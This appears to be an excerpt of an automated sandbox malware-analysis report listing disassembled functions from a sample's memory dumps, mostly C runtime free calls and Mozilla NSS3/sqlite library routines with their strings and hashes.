Function 00EF75D0 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90

Function 00EFAD4A Relevance: 129.2, APIs: 86, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00EFAD5E

Part of subcall function 00EF8A67: HeapFree.KERNEL32(00000000,00000000,?,00EF8978,00000000,00F02C38,00EF89BF,?,?,?,00EF8A2F,00F02C38,?,?,00EFB7F3,00F02C38), ref: 00EF8A7D
Part of subcall function 00EF8A67: GetLastError.KERNEL32(?,?,00EF8978,00000000,00F02C38,00EF89BF,?,?,?,00EF8A2F,00F02C38,?,?,00EFB7F3,00F02C38), ref: 00EF8A8F

_free.LIBCMT ref: 00EFAD66
_free.LIBCMT ref: 00EFAD6E
_free.LIBCMT ref: 00EFAD76
_free.LIBCMT ref: 00EFAD7E
_free.LIBCMT ref: 00EFAD86
_free.LIBCMT ref: 00EFAD8D
_free.LIBCMT ref: 00EFAD95
_free.LIBCMT ref: 00EFAD9D
_free.LIBCMT ref: 00EFADA5
_free.LIBCMT ref: 00EFADAD
_free.LIBCMT ref: 00EFADB5
_free.LIBCMT ref: 00EFADBD
_free.LIBCMT ref: 00EFADC5
_free.LIBCMT ref: 00EFADCD
_free.LIBCMT ref: 00EFADD5
_free.LIBCMT ref: 00EFADE0
_free.LIBCMT ref: 00EFADE8
_free.LIBCMT ref: 00EFADF0
_free.LIBCMT ref: 00EFADF8
_free.LIBCMT ref: 00EFAE00
_free.LIBCMT ref: 00EFAE08
_free.LIBCMT ref: 00EFAE10
_free.LIBCMT ref: 00EFAE18
_free.LIBCMT ref: 00EFAE20
_free.LIBCMT ref: 00EFAE28
_free.LIBCMT ref: 00EFAE30
_free.LIBCMT ref: 00EFAE38
_free.LIBCMT ref: 00EFAE40
_free.LIBCMT ref: 00EFAE48
_free.LIBCMT ref: 00EFAE50
_free.LIBCMT ref: 00EFAE58
_free.LIBCMT ref: 00EFAE66
_free.LIBCMT ref: 00EFAE71
_free.LIBCMT ref: 00EFAE7C
_free.LIBCMT ref: 00EFAE87
_free.LIBCMT ref: 00EFAE92
_free.LIBCMT ref: 00EFAE9D
_free.LIBCMT ref: 00EFAEA8
_free.LIBCMT ref: 00EFAEB3
_free.LIBCMT ref: 00EFAEBE
_free.LIBCMT ref: 00EFAEC9
_free.LIBCMT ref: 00EFAED4
_free.LIBCMT ref: 00EFAEDF
_free.LIBCMT ref: 00EFAEEA
_free.LIBCMT ref: 00EFAEF5
_free.LIBCMT ref: 00EFAF00
_free.LIBCMT ref: 00EFAF0B
_free.LIBCMT ref: 00EFAF19
_free.LIBCMT ref: 00EFAF24
_free.LIBCMT ref: 00EFAF2F
_free.LIBCMT ref: 00EFAF3A
_free.LIBCMT ref: 00EFAF45
_free.LIBCMT ref: 00EFAF50
_free.LIBCMT ref: 00EFAF5B
_free.LIBCMT ref: 00EFAF66
_free.LIBCMT ref: 00EFAF71
_free.LIBCMT ref: 00EFAF7C
_free.LIBCMT ref: 00EFAF87
_free.LIBCMT ref: 00EFAF92
_free.LIBCMT ref: 00EFAF9D
_free.LIBCMT ref: 00EFAFA8
_free.LIBCMT ref: 00EFAFB3
_free.LIBCMT ref: 00EFAFBE
_free.LIBCMT ref: 00EFAFCC
_free.LIBCMT ref: 00EFAFD7
_free.LIBCMT ref: 00EFAFE2
_free.LIBCMT ref: 00EFAFED
_free.LIBCMT ref: 00EFAFF8
_free.LIBCMT ref: 00EFB003
_free.LIBCMT ref: 00EFB00E
_free.LIBCMT ref: 00EFB019
_free.LIBCMT ref: 00EFB024
_free.LIBCMT ref: 00EFB02F
_free.LIBCMT ref: 00EFB03A
_free.LIBCMT ref: 00EFB045
_free.LIBCMT ref: 00EFB050
_free.LIBCMT ref: 00EFB05B
_free.LIBCMT ref: 00EFB066
_free.LIBCMT ref: 00EFB071
_free.LIBCMT ref: 00EFB07F
_free.LIBCMT ref: 00EFB08A
_free.LIBCMT ref: 00EFB095
_free.LIBCMT ref: 00EFB0A0
_free.LIBCMT ref: 00EFB0AB
_free.LIBCMT ref: 00EFB0B6

Memory Dump Source

Source File: 00000000.00000002.1859121240.0000000000EE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.1859096402.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859145624.0000000000EFC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859163330.0000000000F04000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F28000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000000F86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.000000000102A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859181498.0000000001105000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1859377166.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_i3NmF0obCm.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 55745e4d8ffa3bcd4bae6bd50e23aa08e34946fc70669168e917a1c48e4fa5ed
Instruction ID: f1ffbc7b49672fd6f69b7ccab8c56f5caf99033ceb2e8b59d32569d0a66ec6f3
Opcode Fuzzy Hash: 55745e4d8ffa3bcd4bae6bd50e23aa08e34946fc70669168e917a1c48e4fa5ed
Instruction Fuzzy Hash: 0271D231431F089FD7A27B31EF13A7A76E2FF04300F105A16B2DE305369E226A659A51

Function 6C6C6E50 Relevance: 44.0, APIs: 19, Strings: 6, Instructions: 213stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C57CA30: EnterCriticalSection.KERNEL32(?,?,?,6C5DF9C9,?,6C5DF4DA,6C5DF9C9,?,?,6C5A369A), ref: 6C57CA7A
Part of subcall function 6C57CA30: LeaveCriticalSection.KERNEL32(?), ref: 6C57CB26

memset.VCRUNTIME140(00000000,00000000,?,?,6C58BE66), ref: 6C6C6E81
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6C58BE66), ref: 6C6C6E98
sqlite3_snprintf.NSS3(?,00000000,6C72AAF9,?,?,?,?,?,?,6C58BE66), ref: 6C6C6EC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,6C58BE66), ref: 6C6C6ED2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,6C58BE66), ref: 6C6C6EF8
sqlite3_snprintf.NSS3(?,00000019,mz_etilqs_,?,?,?,?,?,?,?,6C58BE66), ref: 6C6C6F1F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6C58BE66), ref: 6C6C6F28
sqlite3_randomness.NSS3(0000000F,00000000,?,?,?,?,?,?,?,?,?,?,?,6C58BE66), ref: 6C6C6F3D
memset.VCRUNTIME140(?,00000000,?,?,?,?,?,6C58BE66), ref: 6C6C6FA6
sqlite3_snprintf.NSS3(?,00000000,6C72AAF9,00000000,?,?,?,?,?,?,?,6C58BE66), ref: 6C6C6FDB
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,6C58BE66), ref: 6C6C6FE4
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C58BE66), ref: 6C6C6FEF
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C58BE66), ref: 6C6C7014
sqlite3_free.NSS3(00000000,?,?,?,?,6C58BE66), ref: 6C6C701D
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,6C58BE66), ref: 6C6C7030
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,6C58BE66), ref: 6C6C705B
sqlite3_free.NSS3(00000000,?,?,?,?,?,6C58BE66), ref: 6C6C7079
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C58BE66), ref: 6C6C7097
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,6C58BE66), ref: 6C6C70A0

Strings

winGetTempname2, xrefs: 6C6C70C4
mz_etilqs_, xrefs: 6C6C6F18
winGetTempname4, xrefs: 6C6C7046
winGetTempname5, xrefs: 6C6C7071
winGetTempname1, xrefs: 6C6C708F
Ppl, xrefs: 6C6C70A8

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: sqlite3_free$strlen$sqlite3_snprintf$CriticalSectionmemset$EnterLeavesqlite3_randomness
String ID: Ppl$mz_etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
API String ID: 593473924-1590197924
Opcode ID: efdf0e941caab08ed3537c5a41583a95aa52dcd4b7b9eda5126451c0ea6e170a
Instruction ID: d7b8345585cf9a5f0b0fd1ad5cd35d49adca08229d00e5a2a9975588429f2a22
Opcode Fuzzy Hash: efdf0e941caab08ed3537c5a41583a95aa52dcd4b7b9eda5126451c0ea6e170a
Instruction Fuzzy Hash: 225168B1B042116BE71096309C59BBB3666DFD2318F144538E81596BC2FB25E90E83EB

Function 6C628E50 Relevance: 42.2, APIs: 14, Strings: 10, Instructions: 169COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_WrapKey), ref: 6C628E76
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C628EA4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C628EB3

Part of subcall function 6C70D930: PL_strncpyz.NSS3(?,?,?), ref: 6C70D963

PR_LogPrint.NSS3(?,00000000), ref: 6C628EC9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C628EE5
PL_strncpyz.NSS3(?, hWrappingKey = 0x%x,00000050), ref: 6C628F17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C628F29
PR_LogPrint.NSS3(?,00000000), ref: 6C628F3F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C628F71
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C628F80
PR_LogPrint.NSS3(?,00000000), ref: 6C628F96
PR_LogPrint.NSS3( pWrappedKey = 0x%p,?), ref: 6C628FB2
PR_LogPrint.NSS3( pulWrappedKeyLen = 0x%p,?), ref: 6C628FCD
PR_LogPrint.NSS3( *pulWrappedKeyLen = 0x%x,?), ref: 6C629047

Strings

hWrappingKey = 0x%x, xrefs: 6C628F01, 6C628F11
*pulWrappedKeyLen = 0x%x, xrefs: 6C629042
pWrappedKey = 0x%p, xrefs: 6C628FAD
pulWrappedKeyLen = 0x%p, xrefs: 6C628FC8
hSession = 0x%x, xrefs: 6C628E8E, 6C628E9E
(CK_INVALID_HANDLE), xrefs: 6C628EAC, 6C628F1F, 6C628F79
npl, xrefs: 6C628FEC, 6C629023
pMechanism = 0x%p, xrefs: 6C628EE0
C_WrapKey, xrefs: 6C628E71
hKey = 0x%x, xrefs: 6C628F5B, 6C628F6B

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulWrappedKeyLen = 0x%x$ hKey = 0x%x$ hSession = 0x%x$ hWrappingKey = 0x%x$ pMechanism = 0x%p$ pWrappedKey = 0x%p$ pulWrappedKeyLen = 0x%p$ (CK_INVALID_HANDLE)$C_WrapKey$npl
API String ID: 1003633598-4248672735
Opcode ID: 439b001f4dcf86231562dbf2fac9c776d64894872c6420094be7089d0f517ae0
Instruction ID: 54c58a22fe413f50ca961a10b8297ef8e6b418c3e1d84b050336be1a445f0cce
Opcode Fuzzy Hash: 439b001f4dcf86231562dbf2fac9c776d64894872c6420094be7089d0f517ae0
Instruction Fuzzy Hash: 3751E872A01104AFDB009F54DE4CF9B7BB6AB4635CF484026F5086BB22DF359918CF9A

Function 6C654FE0 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 175COMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6075C2,00000000,00000000,00000001), ref: 6C655009
PL_strncasecmp.NSS3(?,library=,00000008,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6075C2,00000000), ref: 6C655049
PL_strncasecmp.NSS3(?,name=,00000005,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C65505D
PL_strncasecmp.NSS3(?,parameters=,0000000B,?,?,?,?,?,?,?,?), ref: 6C655071
PL_strncasecmp.NSS3(?,nss=,00000004,?,?,?,?,?,?,?,?,?,?,?), ref: 6C655089
PL_strncasecmp.NSS3(?,config=,00000007,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6550A1
NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6C6550B2
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6075C2), ref: 6C6550CB
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C6550D9
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C6550F5
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C655103
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C65511D
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C65512B
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C655145
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C655153
free.MOZGLUE(?), ref: 6C65516D
NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C65517B
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C655195

Strings

nss=, xrefs: 6C655083
config=, xrefs: 6C65509B
name=, xrefs: 6C655057
parameters=, xrefs: 6C65506B
library=, xrefs: 6C655043

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: FetchL_strncasecmpValuefree$isspace$ParameterSkip
String ID: config=$library=$name=$nss=$parameters=
API String ID: 391827415-203331871
Opcode ID: c737f611828d64f198f1a66ec7ce174870ada34866c90f706118586671b97c27
Instruction ID: fb2c36d5ec7680a8549676048041a355e987abc7024c217a82e0105585056eef
Opcode Fuzzy Hash: c737f611828d64f198f1a66ec7ce174870ada34866c90f706118586671b97c27
Instruction Fuzzy Hash: 4151D7B1A012159BEB11DF24DC45AAB37B8AF1734CF640430EC19E7741EB25E929C7BA

Function 6C654C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON

Download Yara Rule

APIs

PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6C644F51,00000000), ref: 6C654C50
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C644F51,00000000), ref: 6C654C5B
PR_smprintf.NSS3(6C72AAF9,?,0000002F,?,?,?,00000000,00000000,?,6C644F51,00000000), ref: 6C654C76
PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6C644F51,00000000), ref: 6C654CAE
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C654CC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C654CF4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C654D0B
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C644F51,00000000), ref: 6C654D5E
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C644F51,00000000), ref: 6C654D68
PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6C654D85
PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6C654DA2
free.MOZGLUE(?), ref: 6C654DB9
free.MOZGLUE(00000000), ref: 6C654DCF

Strings

%s,%s, xrefs: 6C654C4B
rootFlags, xrefs: 6C654D47
0x%08lx=[%s askpw=%s timeout=%d %s], xrefs: 6C654D9D
0x%08lx=[%s %s], xrefs: 6C654D80
any, xrefs: 6C654C96
ootT, xrefs: 6C654D1A
slotFlags, xrefs: 6C654D34
timeout, xrefs: 6C654C91
rust, xrefs: 6C654D22
every, xrefs: 6C654CA1

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: free$R_smprintf$strlen$Alloc_Util
String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
API String ID: 3756394533-2552752316
Opcode ID: 3d71ce1c9c8d934895239ac543750915fc4774b5823cafd2cab2ad5a875fedf3
Instruction ID: 026c12d89112a61569476b0728b4b2cfad38ca1a6502a44abfcbab83f1277524
Opcode Fuzzy Hash: 3d71ce1c9c8d934895239ac543750915fc4774b5823cafd2cab2ad5a875fedf3
Instruction Fuzzy Hash: E0418CB1900141ABDB125F289C44ABE3AB5AF8334CF698274EC094B702E775E934C7DB

Function 6C636CD0 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 298stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C636910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C636943
Part of subcall function 6C636910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C636957
Part of subcall function 6C636910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C636972
Part of subcall function 6C636910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C636983
Part of subcall function 6C636910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C6369AA
Part of subcall function 6C636910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C6369BE
Part of subcall function 6C636910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C6369D2
Part of subcall function 6C636910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C6369DF
Part of subcall function 6C636910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C636A5B

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C636D8C
free.MOZGLUE(00000000), ref: 6C636DC5
free.MOZGLUE(?), ref: 6C636DD6
free.MOZGLUE(?), ref: 6C636DE7
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C636E1F
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C636E4B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C636E72
free.MOZGLUE(?), ref: 6C636EA7
free.MOZGLUE(?), ref: 6C636EC4
free.MOZGLUE(?), ref: 6C636ED5
free.MOZGLUE(00000000), ref: 6C636EE3
free.MOZGLUE(?), ref: 6C636EF4
free.MOZGLUE(?), ref: 6C636F08
free.MOZGLUE(00000000), ref: 6C636F35
free.MOZGLUE(?), ref: 6C636F44
free.MOZGLUE(?), ref: 6C636F5B
free.MOZGLUE(00000000), ref: 6C636F65

Part of subcall function 6C636C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C63781D,00000000,6C62BE2C,?,6C636B1D,?,?,?,?,00000000,00000000,6C63781D), ref: 6C636C40
Part of subcall function 6C636C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C63781D,?,6C62BE2C,?), ref: 6C636C58
Part of subcall function 6C636C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C63781D), ref: 6C636C6F
Part of subcall function 6C636C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C636C84
Part of subcall function 6C636C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C636C96
Part of subcall function 6C636C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C636CAA

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C636F90
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C636FC5
PK11_GetInternalKeySlot.NSS3 ref: 6C636FF4

Strings

+`dl, xrefs: 6C636D0D

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
String ID: +`dl
API String ID: 1304971872-1530249171
Opcode ID: f49b51b645e239091cfbd41348f212e8de130b946b479f7fb4fef5d2dfa71461
Instruction ID: 3607bee3a72ad158a5067fa04a18fdb5c3edbc1eee2be43f5b1e9bc155ec0253
Opcode Fuzzy Hash: f49b51b645e239091cfbd41348f212e8de130b946b479f7fb4fef5d2dfa71461
Instruction Fuzzy Hash: 74B18FB0E052299FDF00DBA5DC44B9EBBB5BF05349F143029E819E7640E731E919CBA9

Function 6C62AF20 Relevance: 35.1, APIs: 10, Strings: 10, Instructions: 126COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SignMessage), ref: 6C62AF46
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C62AF74
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C62AF83

Part of subcall function 6C70D930: PL_strncpyz.NSS3(?,?,?), ref: 6C70D963

PR_LogPrint.NSS3(?,00000000), ref: 6C62AF99
PR_LogPrint.NSS3( pParameter = 0x%p,?), ref: 6C62AFBE
PR_LogPrint.NSS3( ulParameterLen = 0x%p,?), ref: 6C62AFD9
PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C62AFF4
PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C62B00F
PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6C62B028
PR_LogPrint.NSS3( pulSignatureLen = 0x%p,?), ref: 6C62B041

Strings

ulParameterLen = 0x%p, xrefs: 6C62AFD4
C_SignMessage, xrefs: 6C62AF41
pParameter = 0x%p, xrefs: 6C62AFB9
ulDataLen = %d, xrefs: 6C62B00A
hSession = 0x%x, xrefs: 6C62AF5E, 6C62AF6E
(CK_INVALID_HANDLE), xrefs: 6C62AF7C
npl, xrefs: 6C62B059, 6C62B093
pulSignatureLen = 0x%p, xrefs: 6C62B03C
pSignature = 0x%p, xrefs: 6C62B023
pData = 0x%p, xrefs: 6C62AFEF

Memory Dump Source

Source File: 00000000.00000002.1884024642.000000006C571000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C570000, based on PE: true

Associated: 00000000.00000002.1884002609.000000006C570000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884228524.000000006C70F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884318765.000000006C74E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884378966.000000006C74F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884411344.000000006C750000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1884430350.000000006C755000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c570000_i3NmF0obCm.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pData = 0x%p$ pParameter = 0x%p$ pSignature = 0x%p$ pulSignatureLen = 0x%p$ ulDataLen = %d$ ulParameterLen = 0x%p$ (CK_INVALID_HANDLE)$C_SignMessage$npl
API String ID: 1003633598-67455138
Opcode ID: b025295747556bb05e0daf5a9afbbf45a368f16ccc68ee36a731eec876321bb1
Instruction ID: 54977190e9f34e3ac91ce7515fa9fc9bf2ac6852493254f0ab2646f7e377edd5
